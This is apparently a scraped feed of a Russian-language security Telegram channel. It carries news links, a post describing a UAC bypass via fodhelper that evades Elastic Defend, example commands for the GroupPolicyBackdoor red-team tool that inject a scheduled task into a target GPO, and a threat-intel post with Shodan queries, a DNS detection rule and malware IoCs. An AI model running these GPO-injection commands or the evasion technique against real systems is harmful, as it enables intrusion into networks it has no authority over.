sec.ussc.ru
Анализ ключевых изменений в требованиях к защите информации согласно Приказу ФСТЭК № 117
В целях адаптации требований к защите информации в государственных информационных системах к современным технологиям и угрозам 11.04.2025 был принят Приказ Федеральной службы по техническому и экспортному контролю (ФСТЭК России) от 11.04.2025 № 117 «Об утверждении…
🔗Ссылка:
https://sec.ussc.ru/fstec_117
https://sec.ussc.ru/fstec_117
Forwarded from Whitehat Lab
A chained technique has been identified that allows a local, unprivileged attacker to achieve silent privilege escalation to administrator by bypassing protections enforced by Elastic Defend v9.0.4. The method leverages a trusted auto-elevated Windows binary (fodhelper.exe) in conjunction with a registry hijack and COM object execution, resulting in arbitrary code execution at elevated privileges - without triggering a UAC prompt or EDR detection
#uac #bypass #windows #lpe
Please open Telegram to view this post
VIEW IN TELEGRAM
👎1
securitymedia.org
Новости
Администраторы почтовых серверов Exchange по всему миру рискуют потерять контроль над доменами из-за критической уязвимости, получившей идентификатор CVE-2025-53786. Проблема затрагивает Exchange Server 2016, 2019 и подписочную версию в гибридных конфигурациях.…
Telegraph
OSCP
Дисклеймер Данный пост был написан только для образовательных целей. Не буду расписывать какие-то известные моменты или каким образом проходит экзамен - это было описано многократно. На самом деле не сказал бы, что OSCP - тяжелый экзамен, бывают моменты,…
🔗Ссылка:
https://telegra.ph/OSCP-08-24
https://telegra.ph/OSCP-08-24
Forwarded from Whitehat Lab
GitHub
GitHub - synacktiv/GroupPolicyBackdoor: Group Policy Objects manipulation and exploitation framework
Group Policy Objects manipulation and exploitation framework - synacktiv/GroupPolicyBackdoor
Инструмент пост эксплуатации для различных манипуляций с GPO. Написан на
Впервые представлена на DEFCON 33
Примеры:
#backup
python3 gpb.py restore backup -d 'corp.com' -o './my_backups' --dc ad01-dc.corp.com -u 'john' -p 'Password1!' -n 'TARGET_GPO'
#inject
python3 gpb.py gpo inject --domain 'corp.com' --dc 'ad01-dc.corp.com' -k --module modules_templates/ImmediateTask_create.ini --gpo-name 'TARGET_GPO'
Пример ini:
[MODULECONFIG]
name = Scheduled Tasks
type = computer
[MODULEOPTIONS]
task_type = immediate
program = cmd.exe
arguments = /c "whoami > C:\Temp\poc.txt"
[MODULEFILTERS]
filters =
[{
"operator": "AND",
"type": "Computer Name",
"value": "ad01-srv1.corp.com"
}]
GPO creation, deletion, backup and injections
Various injectable configurations, with, for each, customizable options (see list in the wiki)
Possibility to remove injected configurations from the target GPO
Possibility to revert the actions performed on client devices
GPO links manipulation
GPO enumeration / user privileges enumeration on GPOs
#gpo #redteam #windows
Please open Telegram to view this post
VIEW IN TELEGRAM
www.opennet.ru
Атака на браузерные дополнения с менеджерами паролей, использующая кликджекинг
На конференции DEF CON 33 представлен метод атаки на браузерные дополнения, подставляющие свои элементы интерфейса в просматриваемую страницу. Применение атаки к дополнениям с менеджерами паролей может привести к утечке хранимой в менеджерах паролей информации…
🔗Ссылка:
https://opennet.ru/63754/
https://opennet.ru/63754/
Forwarded from Adaptix Framework
В версии 0.8 будет добавлен Targets Manager (скрин 3).
Заполнять его можно из AxScript, например, написав пост хук для BOF ldapsearch (скрин 1 и 2), или выгрузив из любого коллектора (API
Еще можно добавить сканер, но это уже не сейчас))
Заполнять его можно из AxScript, например, написав пост хук для BOF ldapsearch (скрин 1 и 2), или выгрузив из любого коллектора (API
/targets/add на сервере).Еще можно добавить сканер, но это уже не сейчас))
Forwarded from s0ld13r ch. (s0ld13r)
Netlify as malware delivery service 🙂
На днях, в ходе очередных Threat Intelligence исследований собрал паттерны активных серваков по доставке ВПО, в целом все как обычно - Powershell скрипты, VBS/BAT файлы и EXE🤷♂️
Из интересного, в скриптах больше всего встречался домен netlify.app для стейджа малвари, это легитимный сервис в первую очередь предназначенный для деплоя веб приложений. Однако, как и любые легитимные сервисы он тоже активно эксплуатируется в атаках❗️
Ниже описал варианты детектирования в логах DNS, запросы в Shodan для проактивного поиска серверов/IoC и сами сханченные индикаторы компрометации🔥
🔍 Shodan
http.title:"Index of /" http.html:".ps1"
http.title:"Index of /" http.html:".bat"
http.title:"Index of /" http.html:".py"
http.title:"Index of /" http.html:".exe"
🛡 Detection
🛡 Indicators of Compromise (IoC's)
115.187.41[.]77
118.31.165[.]46
134.122.48[.]158
cyber-cryptor.netlify[.]app
extraordinary-malasada-f7721f.netlify[.]app
github[.]com/Khanzadaofficial/newss/tree/main
c0272f76195c0c20273644b5cf8948aa9a7ce1ee
a625351957b052b1af617bc8196855bc922d9252
e5dc572b9cdba19c7b6865a74ffa41bbb9744fdc
Happy hunting, hunters!
🧢 s0ld13r
На днях, в ходе очередных Threat Intelligence исследований собрал паттерны активных серваков по доставке ВПО, в целом все как обычно - Powershell скрипты, VBS/BAT файлы и EXE
Из интересного, в скриптах больше всего встречался домен netlify.app для стейджа малвари, это легитимный сервис в первую очередь предназначенный для деплоя веб приложений. Однако, как и любые легитимные сервисы он тоже активно эксплуатируется в атаках
Ниже описал варианты детектирования в логах DNS, запросы в Shodan для проактивного поиска серверов/IoC и сами сханченные индикаторы компрометации
http.title:"Index of /" http.html:".ps1"
http.title:"Index of /" http.html:".bat"
http.title:"Index of /" http.html:".py"
http.title:"Index of /" http.html:".exe"
dns.question.name: *.netlify.app and source.ip: *
115.187.41[.]77
118.31.165[.]46
134.122.48[.]158
cyber-cryptor.netlify[.]app
extraordinary-malasada-f7721f.netlify[.]app
github[.]com/Khanzadaofficial/newss/tree/main
c0272f76195c0c20273644b5cf8948aa9a7ce1ee
a625351957b052b1af617bc8196855bc922d9252
e5dc572b9cdba19c7b6865a74ffa41bbb9744fdc
Happy hunting, hunters!
Please open Telegram to view this post
VIEW IN TELEGRAM